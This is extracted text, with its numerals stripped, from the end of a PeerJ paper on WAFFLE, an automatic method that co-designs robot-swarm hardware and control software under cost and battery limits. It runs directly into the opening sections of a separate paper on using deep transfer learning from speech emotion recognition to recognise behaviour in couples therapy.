monetary-constraint in these experiments, the limited resource is the monetary budget, mlimit , available to purchase the robots and range-&-bearing modules. the design process only considers the combinations of hardware modules that keep the total cost of the swarm, pswarm, equal or below the available monetary budget—i.e, pswarm≤mlimit . the total swarm cost, pswarm, is computed with the following equation: pswarm=n × ( pr +px+py ) , ( ) here n is the total number of robots in swarm, that is, to robots; pr is the price of extended version of e-puck without range-&-bearing modules, that is, , €; px and py are the prices of a range-&-bearing receiver and a range-&-bearing transmitter respectively—see table . the minimum cost of a swarm is , €, when the minimum number of robots are equipped with the least-capable range-&-bearing receiver and transmitter modules. the maximum cost of a swarm is , €, when the maximum number of robots are equipped with the most-capable range-&-bearing receiver and transmitter modules. for each mission, we perform two experiments, m and m , where the monetary budget is , € and , € respectively—see table . power-constraint in these experiments, the limited resource is the battery capacity, pbc. there is no constraint on the monetary resources: the design process can choose any combination of the range-&- bearing modules and the number of robots between and —see table . the operation time, tr, of each robot in the swarm depends on its hardware configuration, available battery capacity, and the execution of the individual-level behaviors. the operation time salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of a robot can be computed by the following equation: tr = (pbc× ) (icpu+ilm+irm+iy(r)+ix) , ( ) where icpu is the current rating of robot’s cpu and other fixed sensors, that is, ma. the cpu and other fixed hardware modules will always consume the same power. ilm and irm are the current ratings of the left and the right motors of the robot, that is, ma at maximum speed. ix and iy(r) are the current ratings of range-&-bearing receiver and transmitter modules respectively. r is the range of range-&-bearing transmitter—see table . the experiment terminates, when every robot in the swarm consumes its battery power. the total experiment time, t , is expressed as: t =max ( tr∈{ , , ,...,n} ) . ( ) for each mission, we perform two experiments with different levels of battery capacities: p and p —see table . monetary-&-power-constraint in these experiments, both monetary budget and battery capacity are limited. the design process is required to choose the hardware modules that are not only affordable but also allow robots to operate for a sufficient amount of time. for each mission, we perform four experiments with dual constraints: m p , m p , m p , and m p —see table . protocol the experiments are performed without any human intervention. the design of control software and the configuration of hardware is the result of an automatic design process. for each experiment, we run independent design processes to get hardware configurations and their respective control software in the form of a finite state machine. each design process is run with the design budget of , simulations. the performance of the designs are evaluated via a single run of each design. for each experiment, we report (i) the performance achieved by the swarm, the number of robots comprised in the automatically designed swarm, the hardware modules that have been automatically selected, and the adopted software modules. results in this section, we present the results on a per-mission basis. the instances of control software generated, the data collected, and videos of the experiments are available as online supplementary material (salman, ligot & birattari, ). anytime-selection the performance of an automatically designed swarm depends on the number of robots that reach the black zone and on the moment in which each of them does so: the longer a robot remains on the black zone, the higher the contribution it makes to the score. as a result, the duration of the experiment has an impact on the performance: the longer the experiment, the longer the robot can remain on the black zone and contribute to the score. salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. when economical constraints are imposed, the design process tends to select low-tier hardware; and designs the control software such that the robots move less and save battery life for a longer experiment duration. no-constraint waffle tends to configure robot swarms whose total cost is close to the maximum possible—see fig. d. indeed, the robot swarms comprise to robots—see fig. g— equipped with high-tier range-&-bearing receivers and transmitters—see fig. . at visual inspection, the robots first form clusters and then slowly converge on a black zone: when the robots find a black zone, they spin in place and block the way for the remaining robots, which are therefore unable to enter the zone. this behavior is obtained with exploration, stop, and attraction—see fig. a. as expected, the performance of the swarm is considerably better than the one achieved when constraints are imposed—see fig. a. monetary-constraint under the constraints imposed by m and m , waffle tends to configure the robot swarm so that the total cost is close to the maximum available budget—see fig. d. the number of robots in the swarm decreases proportionally to the monetary budget—see fig. g. the robots are equipped with high-tier range-&-bearing receivers and long-range range-&-bearing transmitters. in m , however, waffle also selects two low-tier range-&- bearing receivers—see fig. . the robot swarms designed under nc and m behave in a similar way. in m , however, the robots prefer to use the attraction low-level behavior to remain in a black zone, but as the robots are equipped with low-tier range-&-bearing receivers, they often leave the black zone: due to the high loss-probability of low-tier range-&-bearing receivers, the robots often fail to perceive the presence of their peers in their neighborhood. the performance of the swarms designed under m and m is considerably lower than the one achieved under nc: in m and m , the swarm comprises fewer robots as compared to nc—see fig. a. power-constraint in contrast to nc, the swarms configured under p and p have a total cost that is noticeably lower than the maximum possible—see fig. d. this is because the robots are equipped with low-price range-&-bearing transmitters, which reduces the overall cost of the swarm—see fig. d. cheaper range-&-bearing transmitters have a shorter transmission range but have low power consumption, which allows a longer battery life. we observe a major shift in the dominant individual-level behaviors in the produced instances of control software. the robots stop in the first black zone they encounter and limit their movement to save energy—see fig. a. consequently, the swarm splits and becomes unable to gather on the same zone. as a result, the performance drops by approximately % as compared to the performance achieved under nc—see fig. a. monetary-&-power-constraint in all experiments, waffle tends to use all the available monetary budget—see fig. d. in m p and m p , waffle designs swarms that comprise to robots—see fig. g— equipped with any of the range-&-bearing receivers and low-range transmitters. in m p salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) anytime-selection (b) end-time-aggregation (c) foraging k k k k p e r fo r m a n c e (d) anytime-selection (e) end-time-aggregation (f) foraging . k k k k c o s t o f a s w a r m (g) anytime-selection (h) end-time-aggregation (i) foraging nc m m p p m p m p m p m p nc m m p p m p m p m p m p nc m m p p m p m p m p m p experiments n o . o f r o b o t s figure the performance in all nine experiments on each mission is shown at the top. performance of waffle in all nine experiments for each mission: anytime-selection (a), end-time- aggregation (b), and foraging (c). total cost of the swarms configured by waffle for each mission (d–f): . k and k are the minimum and maximum possible cost (in €) of a swarm, respectively. number of robots selected by waffle for each mission (g–i). full-size doi: . /peerjcs. /fig- and m p ; however, the number of robots decrease considerably, and the robots are equipped with low-tier range-&-bearing receivers and low-range transmitters—see figs. g and . the control software generated under the monetary-&-power-constraint behave similarly to those of the power-constraint experiments—see fig. a. due to the increased battery capacity, the swarms produced under m p and m p perform slightly better than the ones produced under p , m p , and m p —see fig. a. end-time-aggregation the performance of a designed swarm depends solely on the number of robots that are on the black zone at the end of an experiment. contrary to anytime-selection, if economical salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the number of instances of a specific hardware combination selected in each experiment is shown here. the horizontal axis represents the possible configurations of the range-&-bearing receivers rxrb; the vertical one represents the possible ranges r of the range-&-bearing transmitters t y rb. here,∅ rep- resents the case in which the design process does not select any range-&-bearing receiver or transmitter, x ∈{∅, , , , , , }, and y ∈{∅, , } as shown in table . full-size doi: . /peerjcs. /fig- (a) anytime-selection (b) end-time-aggregation (c) foraging nc m m p p m p m p m p m p experiment-time (%) behaviors: anti-phototaxis attraction exploration phototaxis repulsion stop figure behaviors adopted by the robots in the experiments for the three missions considered: anytime-selection (a), end-time-aggregation (b), and foraging (c). each color represents a behavior. the videos of all experiments are available as online supplementary material (salman, ligot & birattari, ). full-size doi: . /peerjcs. /fig- constraints are applied, the design process tends to select high-tier hardware; and the control software is composed of individual-level behaviors that keep robots assembled on a black zone. salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. no-constraint waffle tends to configure robot swarms whose total cost is close to the maximum possible—see fig. e. the hardware configuration is similar to the one generated under nc for anytime-selection. indeed, the robot swarms comprise to robots—see fig. h—equipped with high-tier range-&-bearing receivers and transmitters—see fig. . at visual inspection, the robots first form clusters and then converge on a black zone: robots tend to remain there by spinning in place until the end of the experiment. this behavior is obtained with exploration, attraction, and stop—see fig. b. the performance of the swarm is considerably better than those achieved when constraints are imposed—see fig. b. monetary-constraint under the constraints imposed by m and m , waffle tends to configure the robot swarm so that the total cost is close to the maximum available budget—see fig. e. the number of robots in the swarm decreases proportionally to the monetary budget—see fig. h. the robots are equipped with long-range range-&-bearing transmitters and high-tier receivers, except a small minority of configurations in which the robots are equipped with low-tier receivers—see fig. . at visual inspection, in m and m the robots converge on a black zone and stay there until the end of the experiments. contrary to nc, the robots stop on the black zone instead of spinning in place: dominant individual-level behaviors are exploration, attraction, and stop—see fig. b. the amount of available monetary budget has a direct impact on the performance of a swarm. indeed, due to the limited monetary budget, the number of robots decreases in the swarms designed under m and m , which results in a considerable performances drop as compared to the performance achieved under nc—see fig. b. power-constraint similar to nc, under the constraints imposed by p and p , waffle tends to configure the robot swarm so that the total cost is close to the maximum possible—see fig. e. indeed, the robot swarms comprise to robots—see fig. h—equipped with high-tier range-&-bearing receivers and long-range transmitters—see fig. . however, this selection of hardware has a direct impact on the duration of the experiments due to its high current rating. as the maximum power is consumed by the motors, the designed control software skips the exploration behavior to move robots in the arena. in some instances of control software, the robots use phototaxis and anti-phototaxis individual-level behaviors to move straight and avoid obstacles. moreover, the most dominant individual-level behavior is attraction which is used to keep the robots assembled on one zone—see fig. b. the performance achieved under p is relatively higher than the one achieved under p . due to the limited battery capacity, which affects the total experiment duration, the swarms designed under p and p have a lower performance than those designed under nc—see fig. b. salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. monetary-&-power-constraint in all experiments, waffle tends to use all the available monetary budget—see fig. e. in m p and m p , waffle designs swarms that comprise to robots—see fig. h— equipped with high-tier range-&-bearing receivers and long-range transmitters—see fig. . in m p and m p , the number of robots decreases considerably, and the robots are equipped with high-tier range-&-bearing receivers and long-range transmitters, except a small minority of configurations in which robots are equipped with low-tier receivers—see fig. . the instances of control software produced are similar to those produced under power-constraint: the movement of robots in the arena is identical and the prominent individual-level behavior is attraction—see fig. b. the performance achieved under m p and m p is slightly better than the one achieved under m p and m p : the level of monetary budget is the key factor that determines whether waffle selects few or more robots—see fig. b. foraging similar to anytime-selection, the performance of swarms designed in the foraging experiments depends on the experiment duration, but it also depends on the total number of robots. contrary to both anytime-selection and end-time-aggregation, the individual robots do not rely on the range-&-bearing hardware. the control software produced enables an effective movement between source and nest. all categories of constraints under all the categories of constraints considered, waffle produced robot swarms sharing the same hardware configuration. this because, in foraging, the robots do not rely on local communication. as a result, the selected hardware configuration typically does not include range-&-bearing transmitter and receiver—see fig. . the total cost of a swarm is between , € and , €—see fig. f. the swarm comprises the largest possible number of robots—see fig. i. all instances of control software that are produced in all experiments have an unexpected behavior. although in all experiments of foraging, the robots are not equipped with range-&-bearing modules, the most prominent individual-level behaviors are attraction and repulsion, which the robots use to explore the arena—see fig. c. the swarm uses these behaviors in a way that is completely different from the one originally intended (francesca et al., ). the reason behind this anomaly is that the individual-level behaviors in the design space are not strictly associated with the related hardware. in the absence of range-&-bearing receivers and transmitters, the attraction and repulsion behaviors are actuating robots to move straight using proximity sensors to avoid obstacles. in all foraging experiments, waffle selects the phototaxis individual-level behavior to locate the nest in the arena, as shown in fig. c. there is no prominent performance difference between the experiments under the no-constraint and monetary-constraint categories—see fig. c. however, we observe a considerable performance drop by the swarms designed under categories of experiments that have limited battery capacity—that is, power-constraint and monetary-&-power- constraint. indeed, the performance achieved in experiments with mah battery salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. capacity—i.e., p , m p , and m p —is considerably better than the performance achieved under experiments with mah battery capacity—i.e., p , m p , and m p — see fig. c. conclusions in this paper, we studied the concurrent automatic design of control software and the automatic configuration of the hardware of robot swarms. in particular, we showed that it is possible to concurrently design control software and hardware for a robot swarm using the principles of automatic modular design. we introduced waffle, a new instance of the automode family of automatic design methods that configures the robot hardware, selects the number of robots in the swarm, and produces control software in the form of a probabilistic finite state machine by combining pre-existing modules that are mission independent. we studied waffle under economic constraints on the total monetary budget available and on the battery capacity of each individual robot comprised in the swarm. we tested waffle on three different collective missions. in the experiments presented in the paper, waffle was able to concurrently design the control software and configure the hardware of a robot swarm. the results suggest that the hardware configuration of the individual robots, the design of control software, and the number of robots highly depend on the nature of the collective mission and the economical constraints imposed. in the paper, we only considered the automatic configuration of one type of hardware module, future studies will focus on extending the automatic design to other sensors and actuators. the range-&-bearing receivers and transmitters proposed in the paper can be manufactured and real-robot experiments can be performed to assess the robustness of the selected configuration to the reality gap. additional information and declarations funding the research has received funding from the european research council (erc) under the european union’s horizon research and innovation programme (grant agreement no ). mauro birattari received support from the belgian fonds de la recherche scientifique – fnrs. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european research council (erc): . belgian fonds de la recherche scientifique – fnrs. competing interests mauro birattari is an academic editor for peerj. salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • muhammad salman conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • antoine ligot performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • mauro birattari contributed reagents/materials/analysis tools, conceived and designed the experiments, analyzed the data, directed the research, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the data is available at iridia - supplementary information, id: iridiasupp - : http://iridia.ulb.ac.be/supp/iridiasupp - /. references birattari m, ligot a, bozhinoski d, brambilla m, francesca g, garattoni l, garzón ramos d, hasselmann k, kegeleirs m, kuckling j, pagnozzi f, roli a, salman m, stützle t. . automatic off-line design of robot swarms: a manifesto. frontiers in robotics and ai :article doi . /frobt. . . brambilla m, brutschy a, dorigo m, birattari m. . property-driven design for swarm robotics: a design method based on prescriptive modeling and model checking. acm transactions on autonomous and adaptive systems ( ): . – . doi . / . brambilla m, ferrante e, birattari m, dorigo m. . swarm robotics: a re- view from the swarm engineering perspective. swarm intelligence ( ): – doi . /s - - - . carlone l, pinciroli c. . robot co-design: beyond the monotone case. arxiv preprint. arxiv: . v . clark aj, moore jm, wang j, tan x, mckinley pk. . evolutionary design and experimental validation of a flexible caudal fin for robotic fish. in: artificial life conference proceedings . cambridge: mit press, – . dorigo m, birattari m, brambilla m. . swarm robotics. scholarpedia ( ):article doi . /scholarpedia. . francesca g, brambilla m, brutschy a, garattoni l, miletitch r, podevijn g, reina a, soleymani t, salvaro m, pinciroli c, birattari m. . automode-chocolate: automatic design of control software for robot swarms. swarm intelligence ( / ): – doi . /s - - - . francesca g, brambilla m, brutschy a, trianni v, birattari m. . automode: a novel approach to the automatic design of control software for robot swarms. swarm intelligence ( ): – doi . /s - - - . salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://iridia.ulb.ac.be/supp/iridiasupp - / http://dx.doi.org/ . /frobt. . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://arxiv.org/abs/ . v http://dx.doi.org/ . /scholarpedia. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. garattoni l, francesca g, brutschy a, pinciroli c, birattari m. . software infras- tructure for e-puck (and tam). technical report tr/iridia/ - , iridia, université libre de bruxelles, belgium.. gutiérrez Á, campo a, dorigo m, donate j, monasterio-huelin f, magdalena l. . open e-puck range & bearing miniaturized board for local communication in swarm robotics. in: kosuge k, ed. ieee international conference on robotics and automation, icra. piscataway: ieee press, – . hamann h. . towards swarm calculus: universal properties of swarm performance and collective decisions. berlin: springer, – . hamann h, wörn h. . a framework of space–time continuous models for algorithm design in swarm robotics. swarm intelligence ( – ): – doi . /s - - - . hasselmann k, ligot a, francesca g, birattari m. . reference models for auto- mode. technical report tr/iridia/ - , iridia. université libre de bruxelles, belgium. hasselmann k, robert f, birattari m. . automatic design of communication-based behaviors for robot swarms. in: dorigo m, ed. swarm intelligence, ants, volume of lncs. cham: springer, – doi . / - - - - _ . heinerman j, rango m, eiben ae. . evolution, individual learning, and social learning in a swarm of real robots. in: ieee symposium series on computational intelligence. piscataway: ieee press, – . hewland j, nitschke gs. . the benefits of adaptive behavior and morphology for cooperation. in: ieee symposium series on computational intelligence. piscataway: ieee press, – . hornby gs, lipson h, pollack jb. . generative representations for the automated design of modular physical robots. ieee transactions on robotics and automation ( ): – doi . /tra. . . kuckling j, ligot a, bozhinoski d, birattari m. . behavior trees as a control architecture in the automatic modular design of robot swarms. in: dorigo m, ed. swarm intelligence, ants, volume of lncs. cham: springer, – doi . / - - - - _ . lerman k, galstyan a. . mathematical model of foraging in a group of robots: effect of interference. autonomous robots ( ): – doi . /a: . lipson h, pollack jb. . automatic design and manufacture of robotic lifeforms. nature : – doi . / . lopes yk, trenkwalder sm, leal ab, dodd tj, groß r. . supervisory control theory applied to swarm robotics. swarm intelligence ( ): – doi . /s - - - . lópez-ibáñez m, dubois-lacoste j, pérez cáceres l, birattari m, stützle t. . the irace package: iterated racing for automatic algorithm configuration. operations research perspectives : – doi . /j.orp. . . . macinnes i. . visually guided physically simulated agents with evolved morpholo- gies. in: advances in artificial life. berlin: springer, – . salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /tra. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /a: http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.orp. . . http://dx.doi.org/ . /peerj-cs. mondada f, bonani m, raemy x, pugh j, cianci c, klaptocz a, magnenat s, zufferey j-c, floreano d, martinoli a. . the e-puck, a robot designed for education in engineering. in: gonçalves p, torres p, alves c, eds. proceedings of the th conference on autonomous robot systems and competitions. portugal: instituto politécnico de castelo branco, – . nolfi s, floreano d. . evolutionary robotics. cambridge: mit press. nygaard tf, martin cp, samuelsen e, torresen j, glette k. . real-world evolution adapts robot morphology and control to hardware limitations. in: proceedings of the genetic and evolutionary computation conference, gecco ’ . new york: acm press, – doi . / . . pahl g, beitz w, feldhusen j, grote k-h. . engineering design: a systematic ap- proach. london: springer. pinciroli c, trianni v, o’grady r, pini g, brutschy a, brambilla m, mathews n, ferrante e, di caro g, ducatelle f, birattari m, gambardella l, dorigo m. . argos: a modular, parallel, multi-engine simulator for multi-robot systems. swarm intelligence ( ): – doi . /s - - - . Şahin e. . swarm robotics: from sources of inspiration to domains of application. berlin: springer, – . salman m, ligot a, birattari m. . concurrent design of control software and config- uration of hardware for robot swarms under economic constraints: supplementary material. available at http://iridia.ulb.ac.be/supp/iridiasupp - / . sims k. . evolving virtual creatures. in: proceedings of the st annual conference on computer graphics and interactive techniques, siggraph ’ . new york: acm press, – doi . / . . trianni v. . evolutionary swarm robotics. berlin: springer. watson j, nitschke g. . deriving minimal sensory configurations for evolved cooperative robot teams. in: ieee congress on evolutionary computation (cec). piscataway: ieee press, – . salman et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://iridia.ulb.ac.be/supp/iridiasupp - / http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. submitted june accepted november published january corresponding author haoqi li, haoqili@usc.edu academic editor meeyoung cha additional information and declarations can be found on page doi . /peerj-cs. copyright li et al. distributed under creative commons cc-by . open access linking emotions to behaviors through deep transfer learning haoqi li , brian baucom and panayiotis georgiou department of electrical and computer engineering, university of southern california, los angeles, ca, united states of america department of psychology, university of utah, salt lake city, ut, united states of america abstract human behavior refers to the way humans act and interact. understanding human behavior is a cornerstone of observational practice, especially in psychotherapy. an important cue of behavior analysis is the dynamical changes of emotions during the conversation. domain experts integrate emotional information in a highly nonlinear manner; thus, it is challenging to explicitly quantify the relationship between emotions and behaviors. in this work, we employ deep transfer learning to analyze their inferential capacity and contextual importance. we first train a network to quantify emotions from acoustic signals and then use information from the emotion recognition network as features for behavior recognition. we treat this emotion-related information as behavioral primitives and further train higher level layers towards behavior quantifica- tion. through our analysis, we find that emotion-related information is an important cue for behavior recognition. further, we investigate the importance of emotional- context in the expression of behavior by constraining (or not) the neural networks’ contextual view of the data. this demonstrates that the sequence of emotions is critical in behavior expression. to achieve these frameworks we employ hybrid architectures of convolutional networks and recurrent networks to extract emotion-related behavior primitives and facilitate automatic behavior recognition from speech. subjects emerging technologies, natural language and speech, social computing keywords behavior quantification, emotion, affective computing, neural networks, couples therapy introduction human communication includes a range of cues from lexical, acoustic and prosodic, turn taking and emotions to complex behaviors. behaviors encode many domain-specific aspects of the internal user state, from highly complex interaction dynamics to expressed emotions. these are encoded at multiple resolutions, time scales, and with different levels of complexity. for example, a short speech signal or a single uttered word can convey basic emotions (ekman, a; ekman, b). more complex behaviors require domain specific knowledge and longer observation windows for recognition. this is especially true in task specific behaviors of interest in observational treatment for psychotherapy such as in couples’ therapy (christensen et al., ) and suicide risk assessment (cummins et al., ). behaviors encompass a rich set of information that includes the dynamics of interlocutors and their emotional states, and can often be domain specific. the evaluation and identification of domain specific behaviors (e.g., blame, suicide ideation) can facilitate how to cite this article li h, baucom b, georgiou p. . linking emotions to behaviors through deep transfer learning. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:haoqili@usc.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. effective and specific treatments by psychologists. during the observational treatment, annotation of human behavior is a time consuming and complex task. thus, there have been efforts on automatically recognizing human emotion and behavior states, which resulted in vibrant research topics such as affective computing (tao & tan, ; picard, ; sander & scherer, ), social signal processing (vinciarelli, pantic & bourlard, ), and behavioral signal processing (bsp) (narayanan & georgiou, ; georgiou, black & narayanan, ). in the task of speech emotion recognition (ser), researchers are combining machine learning techniques to build reliable and accurate affect recognition systems (schuller, ). in the bsp domain, through domain-specific focus on areas such as human communication, mental health and psychology, research targets advances of understanding of higher complexity constructs and helps psychologists to observe and evaluate domain-specific behaviors. however, despite these efforts on automatic emotion and behavior recognition (see ‘related work’), there has been less work on examining the relationship between these two. in fact, many domain specific annotation manuals and instruments (heavey, gill & christensen, ; jones & christensen, ; heyman, ) have clear descriptions that state specific basic emotions can be indicators of certain behaviors. such descriptions are also congruent with how humans process information. for example, when domain experts attempt to quantify complex behaviors, they often employ affective information within the context of the interaction at varying timescales to estimate behaviors of interest (narayanan & georgiou, ; tseng et al., ). moreover, the relationship between behavior and emotion provides an opportunity for (i) transfer learning by employing emotion data, that is easier to obtain, annotate, and less subjective, as the initial modeling task; and (ii) employing emotional information as building blocks, or primitive features, that can describe behavior. the purpose of this work is to explore the relationship between emotion and behavior through deep neural networks, and further the employ emotion-related information towards behavior quantification. there are many notions of what an ‘‘emotion’’ is. for the purpose of this paper and most research in the field (el ayadi, kamel & karray, ; schuller, ), the focus is on basic emotions, which are defined as cross-culturally recognizable. one commonly used discrete categorization is by ekman ( a); ekman ( b), in which six basic emotions are identified as anger, disgust, fear, happiness, sadness, and surprise. according to theories (schacter, gilbert & wegner, ; scherer, ), emotions are states of feeling that result in physical and psychological changes that influence our behaviors. behavior, on the other hand, encodes many more layers of complexity: the dynamics of the interlocutors, their perception, appraisal, and expression of emotion, their thinking and problem-solving intents, skills and creativity, the context and knowledge of interlocutors, and their abilities towards emotion regulation (baumeister et al., ; baumeister et al., ). behaviors are also domain dependent. in addiction (baer et al., ), for example, a therapist will mostly be interested in the language which reflects changes of addictive habits. in suicide prevention (cummins et al., ), reasons for living and emotional bond are more relevant. in doctor-patient interactions, empathy or bedside manners are more applicable. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in this paper, we will first address the task of basic emotion recognition from speech. thus we will discuss literature on the notion of emotion (see ‘emotions’) and prior work on emotion recognition (see ‘emotion quantification from speech’). we will then, as our first scientific contribution, describe a system that can label emotional speech (see ‘emotion recognition’). the focus of this paper, however, is to address the more complex task of behavior analysis. given behavior is very related to the dynamics, perception, and expression of emotions (schacter, gilbert & wegner, ), we believe a study is overdue in establishing the degree to which emotions can predict behavior. we will therefore introduce more analytically the notion of behavior (see ‘behaviour’) and describe prior work in behavior recognition (see ‘behavior quantification from speech’), mainly from speech signals. the second task of this paper will be in establishing a model that can predict behaviors from basic emotions. we will investigate the emotion-to-behavior aspects in two ways: we will first assume that the discrete emotional labels directly affect behavior (see ‘context- dependent behavior recognition from emotion labels’). we will further investigate if an embedding from the emotion system, representing behaviors but encompassing a wider range of information, can better encode behaviorally meaningful information (see ‘context-dependent behavior recognition from emotion-embeddings’). in addition, the notion that behavior is highly dependent on emotional expression also raises the question of how important the sequence of emotional content is in defining behavior. we will investigate this through progressively removing the context from the sequence of emotions in the emotion-to-behavior system (see ‘reduced context-dependent behavior recognition from emotion-informed embeddings’) and study how this affects the automatic behavior classification performance. background emotions there is no consensus in the literature on a specific definition of emotion. an ‘‘emotion’’ is often taken for granted in itself and, most often, is defined with reference to a list of descriptors such as anger, disgust, happiness, and sadness etc. (cabanac, ). oatley & jenkins ( ) distinguish emotion from mood or preference by the duration of each kind of state. two emotion representation models are commonly employed in practice (schuller, ). one is based on the discrete emotion theory, where six basic emotions are isolated from each other, and researchers assume that any emotion can be represented as a mixture of the basic emotions (cowie et al., ). the other model defines emotions via continuous values corresponding to different dimensions which assumes emotions change in a continuous manner and have strong internal connections but blurred boundaries between each other. the two most common dimensions are arousal and valence (schlosberg, ). in our work, following related literature, we will refer to basic emotions as emotions that are expressed and perceived through a short observation window. annotations of such emotions take place without context to ensure that time-scales, back-and-forth interaction dynamics, and domain-specificity is not captured. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. behavior behavior is the output of information and signals including but not limited to those: (i) manifested in both overt and covert multimodal cues (‘‘expressions’’); and (ii) processed and used by humans explicitly or implicitly (‘‘experience’’ and ‘‘judgment’’) (narayanan & georgiou, ; baumeister et al., ). behaviors encompass significant degrees of emotional perception, facilitation, thinking, understanding and regulation, and are functions of dynamic interactions (baumeister et al., ). further, such complex behaviors are increasingly domain specific and subjective. link between emotions and behavior emotions can change frequently and quickly in a short time period (ekman, a; mower & narayanan, ). they are internal states that we perceive or express (e.g., through voice or gesture) but are not interactive and actionable. behaviors, on the other hand, include highly complex dynamics, information from explicit and implicit aspects, are exhibited over longer time scales, and are highly domain specific. for instance, ‘‘happiness’’, as one of the emotional states, is brought about by generally positive feelings. while within couples therapy domain, behavior ‘‘positivity’’ is defined in (heavey, gill & christensen, ; jones & christensen, ) as ‘‘overtly expresses warmth, support, acceptance, affection, positive negotiation’’. those differences apply to both human cognition and machine learning aspects of speech capture, emotion recognition and behavior understanding as shown in fig. (soken & pick, ; hoff, ). the increased complexity and contextualization of behavior can be seen both in humans as well as machines. for example, babies start to develop basic emotion perception at the age of seven months (soken & pick, ). however, it takes emotionally mature and emotionally intelligent humans and often trained domain experts to perceive domain-specific behaviors. in fig. , we illustrate the complexity for machine processing along with the age-of-acquisition for humans. we see a parallel in the increase in demands of identifying behavior in both cases. motivations and goals of this work the relationship between emotion and behavior is usually implicit and highly nonlinear. investigating explicit and quantitative associations between behavior and emotions is thus challenging. in this work, based on the deep neural networks’ (dnns) underlying representative capability (bengio, courville & vincent, ; bengio, ), we try to analyze and interpret the relationship between emotion and behavior information through data-driven methods. we investigate the possibility of using transfer learning by employing emotion data as emotional related building blocks, or primitive features, that can describe behavior. further, we design a deep learning framework that employs a hybrid network structure containing context dependent and reduced contextualization causality models to quantitatively analyze the relationship between basic emotions and complex behaviors. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. voice activity detection recognize native language energy-based activity detection detect sounds from womb isolated word recognition first word recognition large vocabulary word recognition words recognition k words recognition _ hoff ( ) emotion recognition basic emotion perception _ soken & pick ( ) behavior recognition rich dialog transcription human perception and cognition complexity increasing machine learning task complexity increasing linked to mental health and emotional intelligence infants months old infants months old months old months old years old rich domain-specific behavior recognition soken & pick ( ) emotionally mature adults/experts figure illustration of task complexity or age of acquisition for machines and humans. full-size doi: . /peerjcs. /fig- related work researchers are combining machine learning techniques to build reliable and accurate emotion and behavior recognition systems. speech emotion recognition (ser) systems, of importance in human-computer interactions, enable agents and dialogue systems to act in a more human-like manner as conversational partners (schuller, ). on the other hand, in the domain of behavior signal processing (bsp), efforts have been made in quantitatively understanding and modeling typical, atypical, and distressed human behavior with a specific focus on verbal and non-verbal communicative, affective, and social behaviors (narayanan & georgiou, ). we will briefly review the related work in the following aspects. emotion quantification from speech a dominant modality for emotion expression is speech (cowie & cornelius, ). significant efforts (el ayadi, kamel & karray, ; beale & peter, ; schuller et al., ) have focused on automatic speech emotion recognition. traditional emotion recognition systems usually rely on a two-stage approach, in which the feature extraction and classifier training are conducted separately. recently, deep learning has demonstrated promise in emotion classification tasks (han, yu & tashev, ; le & provost, ). convolutional neural networks (cnns) have been shown to be particularly effective in learning affective representations directly from speech spectral features (mao et al., ; anand & verma, ; huang & narayanan, a; zheng, yu & zou, ; aldeneh & provost, ). mao et al. ( ) proposed to learn cnn filters on spectrally whitened spectrograms by an auto-encoder through unsupervised manners. aldeneh & provost ( ) showed that cnns can be directly applied to temporal low-level acoustic features to identify emotionally salient regions. anand & verma ( ) and huang & narayanan ( a) compared multiple kinds of convolutional kernel operations, and showed that the full-spectrum temporal convolution is more favorable for speech emotion recognition tasks. in addition, models with hidden markov model (hmm) (schuller, rigoll & lang, li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ), recurrent neural networks (rnns) (wöllmer et al., ; metallinou et al., ; lee & tashev, ) and the hybrid neural network combining cnns and rnns (lim, jang & lee, ; huang & narayanan, b) have also been employed to model emotion affect. behavior quantification from speech behavioral signal processing (bsp) (narayanan & georgiou, ; georgiou, black & narayanan, ) can play a central role in informing human assessment and decision making, especially in assisting domain specialists to observe, evaluate and identify domain-specific human behaviors exhibited over longer time scales. for example, in couples therapy (black et al., ; nasir et al., b), depression 